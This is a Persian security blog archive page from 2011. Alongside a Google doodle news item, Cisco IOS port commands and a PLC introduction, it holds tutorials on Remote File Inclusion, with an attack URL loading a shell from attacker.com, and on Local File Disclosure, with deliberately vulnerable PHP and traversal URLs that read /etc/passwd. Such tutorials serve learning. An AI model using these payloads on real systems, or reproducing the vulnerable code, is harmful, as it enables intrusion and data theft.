window.addEventListener("load", function(){ alert("کانال تلگرام ما : www.telegram.me/PulseLab"); }); ترشحات ذهنی | ۱۳۹۰/۰۳/۱ - ۱۳۹۰/۰۳/۳۱
جسارت های در باب امنیت اطلاعات و الکترونیک .
تبديل لوگوي گوگل به گيتار
پنجشنبه بیست و ششم خرداد ۱۳۹۰ ساعت 1:17 | نوشته ‌شده به دست سیروس | ( )
google

جام جم آنلاين
سه شنبه 24 خرداد 1390


امروز جمعه، 10 ژوئن، بزرگترین موتور جستجوی دنیا لوگوی خود را به یک گیتار الکترونیک تبدیل کرد که کاربران می توانند با آن موسیقی بنوازند.

به گزارش مهر ، در یکسال اخیر بزرگترین موتور جستجوی دنیا به مناسبت های مختلف به دفعات از لوگوهایی متحرک استفاده کرده است. برای مثال، سال گذشته به مناسبت تولد 30 سالگی بازی ویدیویی «پک- من» ، گوگل لوگویی شبیه به این بازی را ارائه کرد که کاربران می توانستند با کلیک بر روی آن «پک- من» بازی کنند.

همچنین در ماه آوریل، به مناسبت سالگرد تولد چارلی چاپلین، گوگل لوگوی خود را به صورتی درآورده بود که کاربران با کلیک بر روی آن می توانستند یک فیلم صامت به سبک فیلم های چارلی چاپلین را مشاهده کنند.

اما امروز جمعه، صفحه اصلی گوگل یکی از تعاملی ترین لوگوهای خود را ارائه کرده است. این لوگو در بزرگداشت نود و ششمین سالگرد تولد «لس پل» مخترع گیتار الکترونیک به شکل یک گیتار در آمده است.

کاربران گوگل بر روی این لوگو، 10 سیم با زیر و بمی های مختلف را مشاهده می کنند و با حرکت دادن ماوس بر روی هر یک از این سیم ها می توانند از موسیقی که نواخته می شود لذت ببرند و با کلیک بر روی گزینه «ضبط» ، موسیقی خود را ضبط کنند.

کاربران گوگل تاکنون حدود 4 هزار موسیقی را که با این لوگو نواخته شده بر روی سایت «یو تیوب» گذاشته اند.

«لستر ویلیام پلسفاس» معروف به «لس پل» نوازنده و مخترع آمریکایی در 9 ژوئن 1915 متولد شد. این نوازنده گیتار در آگوست 2009 در گذشت.

وی در سال 1940 اولین گیتار الکترونیک دنیا را ساخت. این گیتار که The Log نام گرفت در سال 1946 در کارخانه «گیبسون» تولید شد و به بازار راه یافت.

REMOTE FILE INCLUSION به روشی دیگر
سه شنبه بیست و چهارم خرداد ۱۳۹۰ ساعت 1:13 | نوشته ‌شده به دست سیروس | ( )

REMOTE FILE INCLUSION

کسانی که با web app ها کار کردند این پست برای آنها تکراری است ولی یک تکنیک ساده برای تست RFI می باشد که بلد بودنش بهتر از بلاد نبودنش هست ..

به وسیله Remote File Incution می توانیم دسترسی غیر مجاز به سرور داشته باشیم و کد مخرب را روی هدف اجرا کرده و حمله ای را آغاز کنیم .

وبسایتها آسیبپذیر هستند ، وقتی روی لینکی در یک سایت که مبتنی بر php است کلیک می کنیم ( البته لینک داخلی ) صفحه مورد نظر طبق دستورالعمل زیر فراخوانی می شود :

    http://www.target.com/index.php?page=script.php?

خوب به نظر می آید که هیچی مشکلی نمی آید و صفحه مورد نظر هم  به راحتی بارگزاری می شود . حالا به نظر شما اگر در آخرین بخش به جای اسکریپت :

   Scriplt.php?

آدرس یک سایت را قرار بدهیم . برای مثال Google.com به کد زیر توجه کنید :

http://www.target.com/index.php?page=www.google.com

در این حالت اگر google.com بر روی صفحه نمایشگر  بارگزاری شود یعنی اینکه سایت هدف آسیب پذیر است و اگر ما به جای google.com آدرس کد مخرب php ( شلر – ضمیمه - در آخر مقاله کمی توضیح خواهم داد . ) رو که قبلا در هاست شخصی خود آپلود کردیم رو قرار می دیم . در این صورت فایل مخرب بارگزاری می شود .

در حالت کلی به صورت زیر می شود :

http://www.target.com/index.php?page=http://www.attacker.com/exploit.php

پس از بارگزاری  نتیجه این می شود که کد مخرب بر روی سرور مقصد اجرا شده و ما می تونیم اهداف شوم خود را دنبال کنیم .

برای خواندن مقاله کوتاه آشنائی با شلر ها به ادامه مطلب کلیک کنید .

 

Local File Disclosure/Download
پنجشنبه دوازدهم خرداد ۱۳۹۰ ساعت 12:10 | نوشته ‌شده به دست سیروس | ( )

Local File Disclosure/Download

 

در این آسیب پذیری بر خلاف باگهای هم خانواده خود که فقط توانایی استفاده از آنها را داشتیم در این جا می توانیم را بخوانیم و با آنها ارتباط بر قرار پیدا کنیم .

اکثر توابعی که به ما اجازه می دهند تا فایلها را بخوانیم :

تمام فایل را در یک رشته می خواند

file_get_contents

ایجاد یک فایل

Readfile

تمام فایل را در یک آرایه می خواند

File

یک فایل یاurl را باز می کند

Fopen

تمام نیازها را در یک فایل جایگزین می کند

Highlight_file

highlight_file()

Show_source

مثال کلی :

-          کد زیر را در یک فایل به نام test.php ذخیره کنید

--------------------------------------

                                  

                                   $pagina=$_GET['pagina'];

                                   readfile($pagina);

                                   ?>

                                   -------------------------------------- 

Readfile() تابع ای است که می توانیم با فایل مشخص شده ارتباط و یا آن را بخوانیم . حال با دستور زیر  ما می توانیم passwd را بخوانیم :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

حال ما می توانیم فایل مورد نظر را در خروجی ببینیم و آن را بخوانیم .

مثال ساده :

کد زیر را در فایلی به نام  download.php ذخیره کنید :

-----------------------------------------------------------------------------------

                                  $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];

                                  header("Pragma: public");

                                  header("Expires: 0");

                                  header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); 

                                  header("Content-Type: application/force-download");

                                  header( "Content-Disposition: attachment; filename=".basename($file)); 

                                  //header( "Content-Description: File Transfer");

                                  @readfile($file);

                                  die();

                                  ----------------------------------------------------------------------------------- 

فایل آسیبپذیر ناامن می باشد . همانطور که می بینید در خط اول  REQUEST_$  یک روش در خواست است و فایل به وسیله ای تابع  ()readfile آشکار می شود و ما می توانیم با هر فایل دلخواه ارتباط برقرار کنیم .

و با دستور زیر :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

در خروجی باید با موفقیت فایل  "etc/passwd"  را بخوانیم .

طریقه fix کردن آسیب پذیری

ساده ترین راه این است که اجازه دسترسی به کاراکترهای خاص در آسیب پذیری بگیریم .

راه ساده تر اینکه با یک نقطه فیلتر کنیم   "."   و راه دیگر اینکه با "/" و "\" فیلتر کنیم .

انتشار یافته برای اولین بار از این بلاگ

سیسکو و پورتهای باز
پنجشنبه دوازدهم خرداد ۱۳۹۰ ساعت 12:4 | نوشته ‌شده به دست سیروس | ( )
cisco

آیا تاحالا برای شما پیش آمده که بخواهید ببینید که چه سرویس هایی بر روی روتر شما در حال اجرا است و یا پورت های باز بر روی روتر خودتان را ببنید. خوب در IOS چندین فرمان مختلف برای اینکار درنظر گرفته شده که متاسفانه توضیح خیلی زیادی هم درباره نمی توان پیدا کرد.

اولین فرمانی که در IOS بدین منظور گذاشته شد ، فرمان show ip sockets می باشد. با کمک این فرمان می توان پورت هایی که روتر بر روی آنها Listen می کند ، IP های Local که ارتباط با آن برقرار شده و IP مربوط به Device که به صورت Remote متصل شده است را مشاهده کرد. برای نمونه مثال زیر را در نظر بگیرید :

Proto Remote Port Local Port In Out Stat TTY OutputIF

 17 0.0.0.0 0 10.1.1.1 67 0 0 2211 0

 17 192.168.1.5 37546 192.168.1.9 161 0 0 1 0

 17 --listen-- 10.1.1.1 162 0 0 11 0

 17 --listen-- 10.1.1.1 52497 0 0 1 0

در این خروجی به چند نکته باید توجه داشت . نکته اول اینکه فیلد Proto نشان دهنده پروتکل ارتباطی است که بر اساس عدد آن نوشته شده است. لیست نسبتا کاملی از پروتکل ها و شماره مربوط به آنها را در این لینک می توان پیدا کرد. فیلد دیگری پروتکل شماره 17 نشان دهنده پروتکل UDP است که باید به آن توجه کرد Port است. در مثال بالا پورت های 161 و 162 مربوط به SNMP Server و SNMP Trap Sender می باشند. و یا پورت 68 متعلق به DHCP server است که به درخواست های DHCP که بر روی پورت 67 ارسال می شوند پاسخ می دهد. اگر که آدرس مربوط به Remote IP بصورت Illegal باشد آنرا به صورا  –listen— نشان می دهد. مثلا برای Remote IP آدرس 0.0.0.0 به عنوان Illegal محسوب می شود. در Local IP نیز ، در صورتی که از IP 0.0.0.0 استفاده شده باشد ، بصورت –any—نشان داده می شود.

در نسخه 12.4 این فرمان با سه فرمان show sockets ، show udp و show ip sctp  جایگزین شده است.در IOSنسخه 12.4 نیز فرمان sh control-plane host open-ports اضافه شده که به مراتب بهتر می باشد.

موفق باشید!!!!!!

مقدمه ای بر PLC
پنجشنبه دوازدهم خرداد ۱۳۹۰ ساعت 11:57 | نوشته ‌شده به دست سیروس | ( )
plc 

در گذشته نه چندان دور در بسياري از تابلوهاي فرمان ماشين آلات صنعتي ، براي کنترل پروسه هاي توليد از رله هاي الکترومکانيکي يا سيستمهاي پنوماتيکي استفاده مي کردند و اغلب با ترکيب رله هاي متعدد و اتصال آنها به يکديگر منطق کنترلي مورد نظر ايجاد مي گرديد . در بيشتر ماشين آلات صنعتي ، سيستمهاي تاخيري و شمارنده ها نيز استفده مي گرديد و با اضافه شدن تعدادي Timer و شمارنده به تابلوهاي کنترل , حجم و زمان مونتاژ آن افزايش مي يافت .

اشکال فوق با در نظر گرفتن استهلاک و هزينه بالاي خود و همچنين عدم امکان تغيير در عملکرد سيستم ، باعث گرديد تا از دهه 80 ميلادي به بعد اکثر تابلوهاي فرمان با سيستمهاي کنترلي قابل برنامه ريزي جديد يعني PLC جايگزين گردند .در حال حاضر PLC يکي از اجزاي اصلي و مهم در پروژه هاي اتوماسيون مي باشد که توسط کمپانيهاي متعدد و در تنوع زياد توليد و عرضه ميگردد .

به طور خلاصه سيستمهاي نوين اتوماسيون و ابزار دقيق مبتني بر PLC در مقايسه با کنترل کننده هاي رله اي و کنتاکتوري قديمي داراي امتيازات زير است :

 

      هزينه نصب و راه اندازي آنها پايين مي باشد.

          براي نصب و راه اندازي آنها زمان کمتري لازم است .

          اندازه فيزيکي کمي دارند.

         تعمير و نگه داري آنها بسيار ساده مي باشد.

          به سادگي قابليت گسترش دارند .

          قابليت انجام عمليات پيچيده را دارند.

          ضريب اطمينان بالايي در اجراي فرايندهاي کنترلي دارند .

         ساختار مدولار دارند که تعويض بخشهاي مختلف آن را ساده ميکند.

           اتصالات ورودي ، خروجي و سطوح سيگنال استاندارد دارند.

          زبان برنامه نويسي آنها ساده و سطح بالاست.

          در مقابل نويز و اختلالات محيطي حفاظت شده اند.

          تغيير برنامه در هنگام کار آسان است.

         امکان ايجاد شبکه بين چندين PLC به سادگي ميسر است .

          امکان کنترل از راه دور (به عنوان مثال از طريق خط تلفن يا ساير شبکه هاي ارتباطي ) قابل حصول است .

           امکان اتصال بسياري از تجهيزات جانبي استاندارد از قبيل چاپگر ، بارکد خوان و ... به PLC ها وجود دارد .

 

شرکتهای مهندسي  با توجه به مسائل فوق الذکر و به منظور کاهش مشکلات صنايع مختلف آمادگي دارد با استفاده از کادر مجرب خود در اين زمينه خدمات خود را در قالب طراحي و اجراي سيستمهاي کنترلی صنعتي مبتني بر استفاده از PLC  برای صنایع مختلف ارایه نماید.

 موفق باشید .....

 
دیگر موارد